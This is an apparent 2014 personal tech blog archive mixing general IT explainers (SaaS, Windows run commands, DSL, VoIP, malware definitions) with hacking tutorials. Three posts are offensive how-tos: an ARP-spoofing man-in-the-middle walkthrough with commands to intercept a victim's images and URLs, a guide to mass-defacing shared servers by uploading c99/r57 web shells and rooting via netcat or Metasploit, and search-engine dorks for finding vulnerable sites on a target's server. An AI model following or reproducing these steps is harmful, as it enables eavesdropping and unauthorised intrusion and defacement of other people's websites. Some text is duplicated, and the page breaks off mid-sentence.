mwascomz: August 2014

Sunday 24 August 2014

Command Prompt Short Keys

F1: Pastes the last executed command
(character by character)
F2: Pastes the last executed command (up to
the entered character)
F3: Pastes the last executed command
F4: Deletes current prompt text up to the
entered character
F5: Pastes recently executed commands
(does not cycle)
F6: Pastes ^Z to the prompt
F7: Displays a selectable list of previously
executed commands
F8: Pastes recently executed commands
(cycles)
F9: Asks for the number of the command
from the F7 list to paste

SAAS ( Software as a service )

Software as a service is a software licensing
and delivery model in which software is
licensed on a subscription basis and is
centrally hosted. It is sometimes referred to
as "on-demand software". SaaS is typically
accessed by users using a thin client via a
web browser. SaaS has become a common
delivery model for many business
applications, including office & messaging
software, DBMS software, management
software, CAD software, development
software, gamification, virtualization,
accounting, collaboration, customer
relationship management (CRM), management
information systems (MIS), enterprise
resource planning (ERP), invoicing, human
resource management (HRM), content
management (CM) and service desk
management. SaaS has been incorporated
into the strategy of all leading enterprise
software companies. One of the biggest
selling points for these companies is the
potential to reduce IT support costs by
outsourcing hardware and software
maintenance and support to the SaaS
provider.
According to a Gartner Group estimate, SaaS
sales in 2010 reached $10 billion, and were
projected to increase to $12.1bn in 2011, up
20.7% from 2010. Gartner Group estimates
that SaaS revenue will be more than double
its 2010 numbers by 2015 and reach a
projected $21.3bn. Customer relationship
management (CRM) continues to be the
largest market for SaaS. SaaS revenue within
the CRM market was forecast to reach
$3.8bn in 2011, up from $3.2bn in 2010.
The term "software as a service" (SaaS) is
considered to be part of the nomenclature of
cloud computing, along with infrastructure as
a service (IaaS), platform as a service (PaaS),
desktop as a service (DaaS), backend as a
service (BaaS), and information technology
management as a service (ITMaaS).

10+ linux OS for hacking-

1. Kali Linux - http://www.kali.org/
2. BackBox - http://www.backbox.org/
3. DEFT - http://www.deftlinux.net/
4. Live Hacking OS - https://
www.livehacking.com/
5. Samurai Web Security Framework - http://
sourceforge.net/projects/samurai/
6. Network Security Tool Kit - http://
sourceforge.net/projects/nst/
7. Parrot-sec Forensic OS – http://
www.parrotsec.org/index.php/Main_Page
8. Bugtraq - http://bugtraq-team.com/
9. Nodezero - http://www.nodezero-lin
ux.org/
10. Pentoo - http://www.pentoo.ch/
11. Gnacktrack - http://www.gnacktrack.c
o.uk/

Monday 18 August 2014

Man in the middle attack-

The man-in-the-middle attack (MITM, MIM,
MITMA) in cryptography and computer security is a form of active eavesdropping in
which the attacker makes independent connections with the victims and relays messages between them, making them
believe that they are talking directly to each other over a private connection, when in fact
the entire conversation is controlled by the attacker.it means attacker is in between both
victim and watch thier messages.
required tool-
1. Arpspoof
2. Driftnet
3. Urlsnarf
Arpspoof:- We use it twice
1. To lie to the Gateway about the MAC
address of victim
MAC Address of Victim is that of Back-
Track’s
2. To lie to the Victim about the MAC address of Gateway
MAC Address of Gateway is that of Back-Track’s
Driftnet:- Displays the Graphics, that Victim browses over Internet

Urlsnarf:- Gives the details of URLs, that Victim visits
Steps for that attack-
1) To accomplish this we will modify the IP
Tables and turn Linux into a router.
cat /proc/sys/net/ipv4/ip_forward
2) The default value is “0”. It should be set
to 1. To change the value to 1 enter the
following command:
sudo echo 1 >> /proc/sys/net/ipv4/
ip_forward
3) Now go ahead and check out the
ip_forward file and make sure the value
equals “1”
cat /proc/sys/net/ipv4/ip_forward
4) An arp poisoning attack will redirect data
from the victim’s PC going to their gateway
to be redirected to our box (note you have to
be on the same physical device, such as a
switch or access point to accomplish this).
sudo arpspoof –i eth1 –t 192.168.1.138
192.168.1.1
5) We will now use another arp poisoning
attack to redirect data from the gateway
destined for the victim’s PC back to our
Linux box.
sudo arpspoof –i eth1 –t 192.168.1.1
192.168.1.137
6) Now we launch driftnet. It is listening.
sudo driftnet –i eth1
7) As the victim’s PC browsing the Internet,
images that show up in his web browser are
also displayed on the attacker’s Linux server.
8) The attacker PC launches urlsnarf. URLs
that are accessed on the victim’s PC are
displayed on the attacker’s Linux server

Ten hacking tools for android

1.SpoofApp
SpoofApp is a Caller ID Spoofing, Voice
Changing and Call Recording mobile app for
your iPhone, BlackBerry and Android phone.
It's a decent mobile app to help protect your
privacy on the phone. However, it has been
banned from the Play Store for allegedly
being in conflict with The Truth in Caller ID
Act of 2009.

2.Andosid
The DOS tool for Android Phones allows
security professionals to simulate a DOS
attack (an http post flood attack to be exact)
and of course a dDOS on a web server, from
mobile phones.

3.Faceniff
Allows you to sniff and intercept web session
profiles over the WiFi that your mobile is
connected to. It is possible to hijack sessions
only when WiFi is not using EAP, but it
should work over any private networks.

4.Nmap
Nmap (Network Mapper) is a security
scanner originally written by Gordon Lyon
used to discover hosts and services on a
computer network, thus creating a "map" of
the network. To accomplish its goal, Nmap
sends specially crafted packets to the target
host and then analyses the responses.

5.Anti-Android Network Toolkit
zANTI is a comprehensive network
diagnostics toolkit that enables complex
audits and penetration tests at the push of a
button. It provides cloud-based reporting
that walks you through simple guidelines to
ensure network safety.

6.SSHDroid
SSHDroid is a SSH server implementation for
Android. This application will let you connect
to your device from a PC and execute
commands (like "terminal" and "adb shell")
or edit files (through SFTP, WinSCP,
Cyberduck, etc).

7.WiFi Analyser
Turns your android phone into a Wi-Fi
analyser. Shows the Wi-Fi channels around
you. Helps you to find a less crowded
channel for your wireless router.

8.Network Discovery
Discover hosts and scan their ports in your
Wifi network. A great tool for testing your
network security.

9.ConnectBot
ConnectBot is a powerful open-source
Secure Shell (SSH) client. It can manage
simultaneous SSH sessions, create secure
tunnels, and copy/paste between other
applications. This client allows you to
connect to Secure Shell servers that typically
run on UNIX-based servers.

10.dSploit
Android network analysis and penetration
suite offering the most complete and
advanced professional toolkit to perform
network security assesments on a mobile
device.

Sunday 17 August 2014

What is a digital signature?

Part 1
There are different types of digital
signatures; this tip focuses on digital
signatures for email messages. You may have
received emails that have a block of letters
and numbers at the bottom of the message.
Although it may look like useless text or
some kind of error, this information is
actually a digital signature. To generate a
signature, a mathematical algorithm is used
to combine the information in a key with the
information in the message. The result is a
random-looking string of letters and
numbers.
Why would you use one?
Because it is so easy for attackers and
viruses to "spoof" email addresses , it is
sometimes difficult to identify legitimate
messages. Authenticity may be especially
important for business correspondence—if
you are relying on someone to provide or
verify information, you want to be sure that
the information is coming from the correct
source. A signed message also indicates that
changes have not been made to the content
since it was sent; any changes would cause
the signature to break.
How does it work?
Before you can understand how a digital
signature works, there are some terms you
should know:
Keys - Keys are used to create digital
signatures. For every signature, there is a
public key and a private key.
Private key - The private key is the portion of
the key you use to actually sign an email
message. The private key is protected by a
password, and you should never give your
private key to anyone.
Public key - The public key is the portion of
the key that is available to other people.
Whether you upload it to a public key ring
or send it to someone, this is the key other
people can use to check your signature. A
list of other people who have signed your
key is also included with your public key.
You will only be able to see their identities if
you already have their public keys on your
key ring.
Key ring - A key ring contains public keys.
You have a key ring that contains the keys of
people who have sent you their keys or
whose keys you have gotten from a public
key server. A public key server contains keys
of people who have chosen to upload their
keys.
What is a digital signature? Part 2

Fingerprint - When confirming a key, you will
actually be confirming the unique series of
letters and numbers that comprise the
fingerprint of the key. The fingerprint is a
different series of letters and numbers than
the chunk of information that appears at the
bottom of a signed email message.
Key certificates - When you select a key on a
key ring, you will usually see the key
certificate, which contains information about
the key, such as the key owner, the date the
key was created, and the date the key will
expire.
"Web of trust" - When someone signs your
key, they are confirming that the key
actually belongs to you. The more signatures
you collect, the stronger your key becomes.
If someone sees that your key has been
signed by other people that he or she trusts,
he or she is more inclined to trust your key.
Note: Just because someone else has trusted
a key or you find it on a public key ring does
not mean you should automatically trust it.
You should always verify the fingerprint
yourself.
The process for creating, obtaining, and
using keys is fairly straightforward:
Generate a key using software such as PGP,
which stands for Pretty Good Privacy, or
GnuPG, which stands for GNU Privacy Guard.
Increase the authenticity of your key by
having your key signed by co-workers or
other associates who also have keys. In the
process of signing your key, they will
confirm that the fingerprint on the key you
sent them belongs to you. By doing this, they
verify your identity and indicate trust in your
key.
Upload your signed key to a public key ring
so that if someone gets a message with your
signature, they can verify the digital
signature.
Digitally sign your outgoing email messages.
Most email clients have a feature to easily
add your digital signature to your message.

ABCD... OF CYBERS

A-Apple
B-Bluetooth
C-Chatting
D-Download
E-Email
F-Facebook
G-Google
H-Hotmail
I-Iphone
J-Java
K-Kingston
L-Laptop
M-Message
N-Nero
O-Orkut
P-Picasa
Q-Quick time
R-RAM
S-Server
T-TechNotification
U-USB
V-Vista
W-Wifi
X-XP
Y-Yahoo!
Z-Zorpia.

Some Useful Run Short Commands

:Example : Go > Run > Type control.exe
admintools
Accessibility Controls
access.cpl
Add Hardware Wizard
hdwwiz.cpl
Add/Remove Programs
appwiz.cpl
Administrative Tools
control.exe admintools
Automatic Updates
wuaucpl.cpl
Bluetooth Transfer Wizard
fsquirt
Calculator
calc
Certificate Manager
certmgr.msc
Character Map
charmap
Check Disk Utility
chkdsk
Clipboard Viewer
clipbrd
Command Prompt
cmd
Component Services
dcomcnfg
Computer Management
compmgmt.msc
Date and Time Properties
timedate.cpl
DDE Shares
ddeshare
Device Manager
devmgmt.msc
Direct X Control Panel (if installed)
directx.cpl
Direct X Troubleshooter
dxdiag
Disk Cleanup Utility
cleanmgr
Disk Defragment
dfrg.msc
Disk Management
diskmgmt.msc
Disk Partition Manager
diskpart
Display Properties
control.exe desktop
Display Properties
desk.cpl
Display Properties (w/Appearance Tab
Preselected)
control.exe color
Dr. Watson System Troubleshooting Utility
drwtsn32
Driver Verifier Utility
verifier
Event Viewer
eventvwr.msc
File Signature Verification Tool
sigverif
Findfast
findfast.cpl
Folders Properties
control.exe folders
Fonts
control.exe fonts
Fonts Folder
fonts
Free Cell Card Game
freecell
Game Controllers
joy.cpl
Group Policy Editor (XP Prof)
gpedit.msc
Hearts Card Game
mshearts
Iexpress Wizard
iexpress
Indexing Service
ciadv.msc
Internet Properties
inetcpl.cpl
Java Control Panel (if installed)
jpicpl32.cpl
Java Control Panel (if installed)
javaws
Keyboard Properties
control.exe keyboard
Local Security Settings
secpol.msc
Local Users and Groups
lusrmgr.msc
Logs You Out Of Windows
logoff
Microsoft Chat
winchat
Minesweeper Game
winmine
Mouse Properties
control.exe mouse
Mouse Properties
main.cpl
Network Connections
control.exe netconnections
Network Connections
ncpa.cpl
Network Setup Wizard
netsetup.cpl
Nview Desktop Manager (if installed)
nvtuicpl.cpl
Object Packager
packager
ODBC Data Source Administrator
odbccp32.cpl
On Screen Keyboard
osk
Opens AC3 Filter (if installed)
ac3filter.cpl
Password Properties
password.cpl
Performance Monitor
perfmon.msc
Performance Monitor
perfmon
Phone and Modem Options
telephon.cpl
Power Configuration
powercfg.cpl
Printers and Faxes
control.exe printers
Printers Folder
printers
Private Character Editor
eudcedit
Quicktime (If Installed)
QuickTime.cpl
Regional Settings
intl.cpl
Registry Editor
regedit
Registry Editor
regedit32
Removable Storage
ntmsmgr.msc
Removable Storage Operator Requests
ntmsoprq.msc
Resultant Set of Policy
rsop.msc
Resultant Set of Policy (XP Prof)
rsop.msc
Scanners and Cameras
sticpl.cpl
Scheduled Tasks
control.exe schedtasks
Security Center
wscui.cpl
Services
services.msc
Shared Folders
fsmgmt.msc
Shuts Down Windows
shutdown
Sounds and Audio
mmsys.cpl
Spider Solitare Card Game
spider
SQL Client Configuration
cliconfg
System Configuration Editor
sysedit
System Configuration Utility
msconfig
System File Checker Utility
sfc
System Properties
sysdm.cpl
Task Manager
taskmgr
Telnet Client
telnet
User Account Management
nusrmgr.cpl
Utility Manager
utilman
Windows Firewall
firewall.cpl
Windows Magnifier
magnify
Windows Management Infrastructure
wmimgmt.msc
Windows System Security Tool
syskey
Windows Update Launches
wupdmgr
Windows XP Tour Wizard
tourstart
Wordpad
write

Ten hacking tools for android

1.SpoofApp
SpoofApp is a Caller ID Spoofigng, Voice
Changing and Call Recording mobile app for
your iPhone, BlackBerry and Android phone.
It's a decent mobile app to help protect your
privacy on the phone. However, it has been
banned from the Play Store for allegedly
being in conflict with The Truth in Caller ID
Act of 2009.
2.Andosid
The DOS tool for Android Phones allows
security professionals to simulate a DOS
attack (an http post flood attack to be exact)
and of course a dDOS on a web server, from
mobile phones.
3.Faceniff
Allows you to sniff and intercept web session
profiles over the WiFi that your mobile is
connected to. It is possible to hijack sessions
only when WiFi is not using EAP, but it
should work over any private networks.
4.Nmap
Nmap (Network Mapper) is a security
scanner originally written by Gordon Lyon
used to discover hosts and services on a
computer network, thus creating a "map" of
the network. To accomplish its goal, Nmap
sends specially crafted packets to the target
host and then analyses the responses.
5.Anti-Android Network Toolkit
zANTI is a comprehensive network
diagnostics toolkit that enables complex
audits and penetration tests at the push of a
button. It provides cloud-based reporting
that walks you through simple guidelines to
ensure network safety.
6.SSHDroid
SSHDroid is a SSH server implementation for
Android. This application will let you connect
to your device from a PC and execute
commands (like "terminal" and "adb shell")
or edit files (through SFTP, WinSCP,
Cyberduck, etc).
7.WiFi Analyser
Turns your android phone into a Wi-Fi
analyser. Shows the Wi-Fi channels around
you. Helps you to find a less crowded
channel for your wireless router.
8.Network Discovery
Discover hosts and scan their ports in your
Wifi network. A great tool for testing your
network security.
9.ConnectBot
ConnectBot is a powerful open-source
Secure Shell (SSH) client. It can manage
simultaneous SSH sessions, create secure
tunnels, and copy/paste between other
applications. This client allows you to
connect to Secure Shell servers that typically
run on UNIX-based servers.
10.dSploit
Android network analysis and penetration
suite offering the most complete and
advanced professional toolkit to perform
network security assesments on a mobile
device.

Tuesday 12 August 2014

32 bit vs 64 Bit ( For Windows users & System Administrators )

Technically x86 simply refers to a family of
processors and the instruction set they all
use. It doesn't actually say anything specific
about data sizes.
x86 started out as a 16-bit instruction set
for 16-bit processors (the 8086 and 8088
processors), then was extended to a 32-bit
instruction set for 32-bit processors (80386
and 80486), and now has been extended to a
64-bit instruction set for 64-bit processors.
It used to be written as 80x86 to reflect the
changing value in the middle of the chip
model numbers, but somewhere along the
line the 80 in the front was dropped, leaving
just x86.
Blame the Pentium and it's offspring for
changing the way in which processors were
named and marketed, although all newer
processors using Intel's x86 instruction set
are still referred to as x86, i386, or i686
compatible (which means they all use
extensions of the original 8086 instruction
set).
x64 is really the odd man out here. The first
name for the 64-bit extension to the x86 set
was called x86-64. It was later named to
AMD64 (because AMD were the ones to come
up with the 64-bit extension originally). Intel
licensed the 64-bit instruction set and
named their version EM64T. Both instruction
sets and the processors that use them are all
still considered x86.
System requirements
32 bit :- 1-gigahertz (GHz) 32-bit (x86)
processor or 64-bit (x64) processor,512 MB
of RAM
64 bit :- 1-GHz 64-bit (x64) processor, 1 GB
of RAM (4 GB recommended)
Memory access
32 bit :- A 32-bit version of Windows Vista
can access up to 4 GB of RAM.
64 bit :- A 64-bit version of Windows Vista
can access from 1 GB of RAM to more than
128 GB of RAM.
Memory access per edition
32 bit :- All 32-bit versions of Windows Vista
can access up to 4 GB of RAM.
64 bit :- Windows Vista Home Basic – 8 GB
of RAM
Windows Vista Home Premium – 16 GB of
RAM
Windows Vista Business – 128 GB of RAM or
more
Windows Vista Enterprise – 128 GB of RAM
or more
Windows Vista Ultimate – 128 GB of RAM or
more
DEP
32-bit versions of Windows Vista use a
software-based version of DEP.
64-bit versions of Windows Vista support
hardware-backed DEP.
Kernel Patch Protection (PatchGuard)
32 bit :- This feature is not available in 32-
bit versions of Windows Vista.
64 bit : - This feature is available in 64-bit
versions of Windows Vista. Kernel Patch
Protection helps prevent a malicious
program from updating the Windows Vista
kernel. This feature works by helping to
prevent a kernel-mode driver from extending
or replacing other kernel services. Also, this
feature helps prevent third-party programs
from updating (patching) any part of the
kernel.
Driver signing
32-bit versions of Windows Vista support 32-
bit drivers that are designed for Windows
Vista.
64-bit versions of Windows Vista do not
support 32-bit device drivers.
16-bit program support
32-bit versions of Windows Vista support 16-
bit programs, in part.
64-bit versions of Windows Vista do not
support 16-bit programs.
Note:-
If you value the benefits and advantages of
switching and embracing 64-bit Windows
Vista, here’s a few considerations to ponder
before making the move to install x64
Windows Vista:
64-bit device drivers may not be available
for one or more devices in the computer.
Device drivers must be digitally signed.
32-bit device drivers are not supported.
32-bit programs may not be fully compatible
with a 64-bit operating system.
It may be difficult to locate programs that
are written specifically for a 64-bit operating
system.
Not all hardware devices may be compatible
with a 64-bit version of Windows Vista.

Computer threats Malware, Spyware, Virus, Worm , Bot , Backdoor

Virus – this is a term that used to be generic.
Any bad software used to be a virus;
however, we use the term “malware” now.
We use the word “virus” to describe a
program that self-replicates after hooking
itself onto something running in Windows®.
Worm – a worm is another kind of self-
replicating program but generally doesn’t
hook itself onto a Windows process. Worms
generally are little programs that run in the
background of your system.
Trojan – software that you thought was going
to be one thing, but turns out to be
something bad. Named for the fabled “Trojan
Horse” that appeared to be a gift but in fact
carried a dangerous payload.
Drive-by download – this is probably the
most popular way to get something nasty
into your computer. Most of the time, it
comes from visiting a bad web page. That
web page exploits a weakness in your
browser and causes your system to become
infected.
Malware Actions
Malware:
This is a big catchall phrase that covers all
sorts of software with nasty intent. Not
buggy software, not programs you don’t like,
but software which is specifically written
with the intent to harm.
Once malware is in your computer, it can do
many things. Sometimes it’s only trying to
replicate itself with no harm to anyone, other
times it’s capable of doing very nasty things.
Adware – not truly malware and almost
never delivered using one of the methods
above. Adware is software that uses some
form of advertising delivery system.
Sometimes the way that advertisements are
delivered can be deceptive in that they track
or reveal more information about you than
you would like. Most of the time, you agree
to the adware tracking you when you install
the software that it comes with. Generally, it
can be removed by uninstalling the software
it was attached to.
Spyware – software that monitors your
computer and reveals collected information
to an interested party. This can be benign
when it tracks what webpages you visit; or it
can be incredibly invasive when it monitors
everything you do with your mouse and
keyboard.
Ransomware – lately a very popular way for
Internet criminals to make money. This
malware alters your system in such a way
that you’re unable to get into it normally. It
will then display some kind of screen that
demands some form of payment to have the
computer unlocked. Access to your computer
is literally ransomed by the cyber-criminal.
Scareware – software that appears to be
something legit (usually masquerading as
some tool to help fix your computer) but
when it runs it tells you that your system is
either infected or broken in some way. This
message is generally delivered in a manner
that is meant to frighten you into doing
something. The software claims to be able to
fix your problems if you pay them.
Scareware is also referred to as “rogue”
software – like rogue antivirus.
Bots
"Bot" is derived from the word "robot" and
is an automated process that interacts with
other network services. Bots often automate
tasks and provide information or services
that would otherwise be conducted by a
human being. A typical use of bots is to
gather information (such as web crawlers),
or interact automatically with instant
messaging (IM), Internet Relay Chat (IRC), or
other web interfaces. They may also be used
to interact dynamically with websites.
Bots can be used for either good or
malicious intent. A malicious bot is self-
propagating malware designed to infect a
host and connect back to a central server or
servers that act as a command and control
(C&C) center for an entire network of
compromised devices, or "botnet." With a
botnet, attackers can launch broad-based,
"remote-control," flood-type attacks against
their target(s). In addition to the worm-like
ability to self-propagate, bots can include the
ability to log keystrokes, gather passwords,
capture and analyze packets, gather financial
information, launch DoS attacks, relay spam,
and open back doors on the infected host.
Bots have all the advantages of worms, but
are generally much more versatile in their
infection vector, and are often modified
within hours of publication of a new exploit.
They have been known to exploit back doors
opened by worms and viruses, which allows
them to access networks that have good
perimeter control. Bots rarely announce
their presence with high scan rates, which
damage network infrastructure; instead they
infect networks in a way that escapes
immediate notice.
Exploit
An exploit is a piece of software, a
command, or a methodology that attacks a
particular security vulnerability. Exploits are
not always malicious in intent—they are
sometimes used only as a way of
demonstrating that a vulnerability exists.
However, they are a common component of
malware.
Back Door
A back door is an undocumented way of
accessing a system, bypassing the normal
authentication mechanisms. Some back doors
are placed in the software by the original
programmer and others are placed on
systems through a system compromise, such
as a virus or worm. Usually, attackers use
back doors for easier and continued access
to a system after it has been compromised.

Meaning of HTTP Status Codes

HTTP, Hypertext Transfer Protocol, is the
method by
which clients (i.e. you) and servers
communicate.
When someone clicks a link, types in a URL
or submits
out a form, their browser sends a request to
a server
for information. It might be asking for a
page, or
sending data, but either way, that is called
an HTTP
Request. When a server receives that request,
it sends
back an HTTP Response, with information for
the
client.
Usually, this is invisible, though I'm sure
you've seen
one of the very common Response codes -
404,
indicating a page was not found. There are a
fair few
more status codes sent by servers, and the
following
is a list of the current ones in HTTP 1.1,
along with an
explanation of their meanings.

Acunetix

Acunetix has a free and paid version. This
hacking tool has many uses but in essence it
tests and reports on SQL injection and Cross
Site scripting testing. It has a state of the art
crawler technology which includes a client
script analyzer engine. This security tool
generates detailed reports that identify
security issues and vulnerabilities. The latest
version, Acunetix WVS version 8, includes
several security features such as a new
module that tests slow HTTP Denial of
Service. This latest version also ships with a
compliance report template for ISO 27001.
This is useful for penetration testers and
developers since it allows organizations to
validate that their web applications are ISO
27001 compliant

Aircrack-ng

Aircrack-ng is a comprehensive set of
network security tools that includes,
aircrack-ng (which can cracks WEP and WPA
Dictionary attacks), airdecap-ng (which can
decrypts WEP or WPA encrypted capture
files), airmon-ng (which places network cards
into monitor mode, for example when using
the Alfa Security Scanner with rtl8187),
aireplay-ng (which is a packet injector),
airodump-ng (which is a packet sniffer),
airtun-ng (which allows for virtual tunnel
interfaces), airolib-ng (which stores and
manages ESSID and password lists),
packetforge-ng (which can create encrypted
packets for injection), airbase-ng (which
incorporates techniques for attacking clients)
and airdecloak-ng (which removes WEP
cloaking). Other tools include airdriver-ng (to
manage wireless drivers), airolib-ng (to store
and manages ESSID and password lists and
compute Pairwise Master Keys), airserv-ng
(which allows the penetration tester to
access the wireless card from other
computers). Airolib-ng is similiar to easside-
ng which allows the user to run tools on a
remote computer, easside-ng (permits a
means to communicate to an access point,
without the WEP key), tkiptun-ng (for WPA/
TKIP attacks) and wesside-ng (which an an
automatic tool for recovering wep keys).
Like most of the security tools in our list,
Aircrack also has a GUI interface – called
Gerix Wifi Cracker. Gerix is a freely licensed
security tool under the GNU General Public
License and is bundled within penetration
testing Linux distributions such a kali linux ,
BackTrack And Backbox. The Gerix GUI has
several penetration testing tools that allow
for network analysis, wireless packet
capturing, and SQL packet injection.

Wireshark

Wireshark has been around for ages and is
extremely popular. Wireshark allows the
pentester to put a network interface into a
promiscuous mode and therefore see all
traffic. This tool has many features such as
being able to capture data from live network
connection or read from a file that saved
already-captured packets. Wireshark is able
to read data from a wide variety of
networks, from Ethernet, IEEE 802.11, PPP,
and even loopback. Like most tools in our
2013 Concise Courses Security List the
captured network data can be monitored and
managed via a GUI – which also allows for
plug-ins to be inserted and used. Wireshark
can also capture VoIP packets and raw USB
traffic can also be captured.

How to deface the whole server

There are two type of server
1-shared server
2-independent server
in shared server there are lot of website
running on that server .that's why hacking all
websites is easier.
for mass deface firstly we can find the vuln
website(sqli, rfi,lfi)
after that you can upload your shell
(c99 ,r57)
then if it is Linux server then you can
symlink the server or rooted the server by
using net cat
if it is windows server then you can use
metasploit
for that you can create vuln file and
executed by the shell.after that you got
meterpreter and by using that you have fully
access on all websites for deface

What is the difference between a domain, a workgroup, and a homegroup? Domains, workgroups, and homegroups

They represent different methods for organizing
computers in networks. The main difference
among them is how the computers and other
resources on the networks are managed.
Computers running Windows on a network
must be part of a workgroup or a domain.
Computers running Windows on home
networks can also be part of a homegroup,
but it's not required.
Computers on home networks are usually
part of a workgroup and possibly a
homegroup, and computers on workplace
networks are usually part of a domain.
In a workgroup:
============
All computers are peers; no computer has
control over another computer.
Each computer has a set of user accounts. To
log on to any computer in the workgroup,
you must have an account on that computer.
There are typically no more than twenty
computers.
A workgroup is not protected by a password.
All computers must be on the same local
network or subnet.
In a homegroup:
=============
Computers on a home network must belong
to a workgroup, but they can also belong to
a homegroup. A homegroup makes it easy to
share pictures, music, videos, documents,
and printers with other people on a home
network.
A homegroup is protected with a password,
but you only need to type the password
once, when adding your computer to the
homegroup.
In a domain:
==========
One or more computers are servers. Network
administrators use servers to control the
security and permissions for all computers
on the domain. This makes it easy to make
changes because the changes are
automatically made to all computers. Domain
users must provide a password or other
credentials each time they access the
domain.
If you have a user account on the domain,
you can log on to any computer on the
domain without needing an account on that
computer.
You probably can make only limited changes
to a computer's settings because network
administrators often want to ensure
consistency among computers.
There can be thousands of computers in a
domain.
The computers can be on different local
networks.
==========================================
Note : - Info Based and copied from MS
official Website , For more u can visit &
learn From Microsoft Website
===========================================

Asymmetric digital subscriber line ( ADSL ) & Digital subscriber line (DSL )

Asymmetric digital subscriber line (ADSL) is a
type of digital subscriber line (DSL)
technology, a data communications
technology that enables faster data
transmission over copper telephone lines
than a conventional voiceband modem can
provide. It does this by utilizing frequencies
that are not used by a voice telephone call. A
splitter, or DSL filter, allows a single
telephone connection to be used for both
ADSL service and voice calls at the same
time. ADSL can generally only be distributed
over short distances from the telephone
exchange (the last mile),
Note :- typically less than 4 kilometres (2
mi), but has been known to exceed 8
kilometres (5 mi) if the originally laid wire
gauge allows for further distribution.
At the telephone exchange the line generally
terminates at a digital subscriber line access
multiplexer (DSLAM) where another
frequency splitter separates the voice band
signal for the conventional phone network.
Data carried by the ADSL are typically routed
over the telephone company's data network
and eventually reach a conventional Internet
Protocol network.
ADSL (Asymmetric Digital Subscriber Line)
uses an ordinary phone line to deliver a
high-speed Internet connection. It does this
by converting the data from your computer
into high-frequency signals. These high-
frequency signals can travel along a
telephone cable at the same time as a voice
call because the ADSL and voice signals use
different frequency ranges
Digital subscriber line (DSL; originally digital
subscriber loop) is a family of technologies
that provide internet access by transmitting
digital data using a local telephone network
which uses the Public switched telephone
network. In telecommunications marketing,
the term DSL is widely understood to mean
asymmetric digital subscriber line (ADSL), the
most commonly installed DSL technology.
DSL service is delivered simultaneously with
wired telephone service on the same
telephone line. This is possible because DSL
uses higher frequency bands for data. On the
customer premises, a DSL filter on each non-
DSL outlet blocks any high frequency
interference, to enable simultaneous use of
the voice and DSL services.
The bit rate of consumer DSL services
typically ranges from 256 kbit/s to over 100
Mbit/s in the direction to the customer
(downstream), depending on DSL technology,
line conditions, and service-level
implementation. Bit rates of 1 Gbit/s have
been reached in trials. In ADSL, the data
throughput in the upstream direction, (the
direction to the service provider) is lower,
hence the designation of asymmetric service.
Note:- In symmetric digital subscriber line
(SDSL) services, the downstream and
upstream data rates are equal.
Researchers at Bell Labs have reached
broadband speeds of 10Gbps, while
delivering 1Gbit/s symmetrical ultra-
broadband access services using traditional
copper telephone lines. These speeds can be
achieved with existing telephone lines and
can be used to deliver broadband where
fiber optic cables can't be installed to the
premise.
A 2007 book described DSL as "the most
globally prolific broadband access
technology, yet it is only available to around
60–75 percent of the population in many
developed countries." A 2012 survey found
that "DSL continues to be the dominant
technology for broadband access" with 364.1
million subscribers worldwide

Voice-over-Internet Protocol (VoIP)

Voice over IP
Voice-over-Internet Protocol (VoIP) is a
methodology and group of technologies for
the delivery of voice communications and
multimedia sessions over Internet Protocol
(IP) networks, such as the Internet. Other
terms commonly associated with VoIP are IP
telephony, Internet telephony, voice over
broadband (VoBB), broadband telephony, IP
communications, and broadband phone
service.
The term Internet telephony specifically
refers to the provisioning of communications
services (voice, fax, SMS, voice-messaging)
over the public Internet, rather than via the
public switched telephone network (PSTN).
The steps and principles involved in
originating VoIP telephone calls are similar
to traditional digital telephony and involve
signaling, channel setup, digitization of the
analog voice signals, and encoding. Instead
of being transmitted over a circuit-switched
network, however, the digital information is
packetized, and transmission occurs as IP
packets over a packet-switched network.
Such transmission entails careful
considerations about resource management
different from time-division multiplexing
(TDM) networks.ternet Protocol (VoIP) is a
methodology and group of technologies for
the delivery of voice communications and
multimedia sessions over Internet Protocol
(IP) networks, such as the Internet. Other
terms commonly associated with VoIP are IP
telephony, Internet telephony, voice over
broadband (VoBB), broadband telephony, IP
communications, and broadband phone
service.
The term Internet telephony specifically
refers to the provisioning of communications
services (voice, fax, SMS, voice-messaging)
over the public Internet, rather than via the
public switched telephone network (PSTN).
The steps and principles involved in
originating VoIP telephone calls are similar
to traditional digital telephony and involve
signaling, channel setup, digitization of the
analog voice signals, and encoding. Instead
of being transmitted over a circuit-switched
network, however, the digital information is
packetized, and transmission occurs as IP
packets over a packet-switched network.
Such transmission entails careful
considerations about resource management
different from time-division multiplexing
(TDM) networks.

Target website hacking

>firstly you can use the scanner like
acuenetix,netsparker,nikto,nessus etc
and you can check the known vuln like the
sqli,rfi,lfi,web dav etc
>if this attack can not success then you can
use this awesome trick
-firstly by using http://www.yougetsignal
.com/ that website you can find the all
website which is running on that server
- after that you can by using bing search
engine
-and check target website is on shared ip
-on the bing search ip:server ip adress
-ip:server ip adress .php?id= (for checking
sqli vuln website on that server)
-ip:server ip adress admin (for checking the
admin of that website in that server and use
sql injection)
-ip:server ip adress upload (for upload the
shell on website)
>if you get any vuln(like -sqli,rfi,web dav etc)
you can upload your shell on that website by
using that shell you can get access on the
target website.once you get access on target
website you can deface the whole website
******************************
**********************************
there are several dork for finding vuln
you can create your own dork and use that
for hacking all the website on that server

Prominent world founders

*Founder of facebook-Mark zuckerburg
*Founder of Apple Computers – Steve Jobs
*Founder of Artificial Intelligence – John
McCarthy
*Founder of Bluetooth – Ericsson
*Father of Computer – Charles Babbage
*Father of ‘C’ Language – Dennis Ritchie
*Founder of Email – Shiva Ayyadurai
*Founder of Google – Larry Page and Sergey
Brin
*Founder of Internet – Vint Cerf
*Father of ‘Java’- James Gosling
*Father of JQuery – John Resig
*Founder of Keyboard – Christoper Latham
Sholes
*Founder of Linux – Linus Torvalds
*Founder of Microsoft – Bill Gates and Paul
Allen
*Founder of Mobile Phones – Martin Cooper
*Founder of Mouse – Douglas Engelbart
*Founders of Oracle – Ed Oates, Larry
Ellison, Bob Miner
*Founder of Php – Rasmus Lerdorf
*Founder of USB – Ajay V.Bhatt
*Founder of WWW – Tim Berners-Lee
*Founder of Yahoo – Jurry Yang and David
Filo

Wednesday 6 August 2014

Eight unknown facts of android -

• It wasn't Google's idea: Android was the
brainchild of
Andy Rubin, who founded Android Inc. in
October 2003
with the aim of creating a new mobile
platform. Google
later bought Android Inc. and hired Rubin
and others in
August 2005.
• It almost didn't work out: Android almost
immediately
ran out of cash after its founding, only to be
saved,
according to the Businessweek, by Steve
Perlman.
• The Nexus line was a hot rumour years
before the
Nexus One: People started predicting about
the
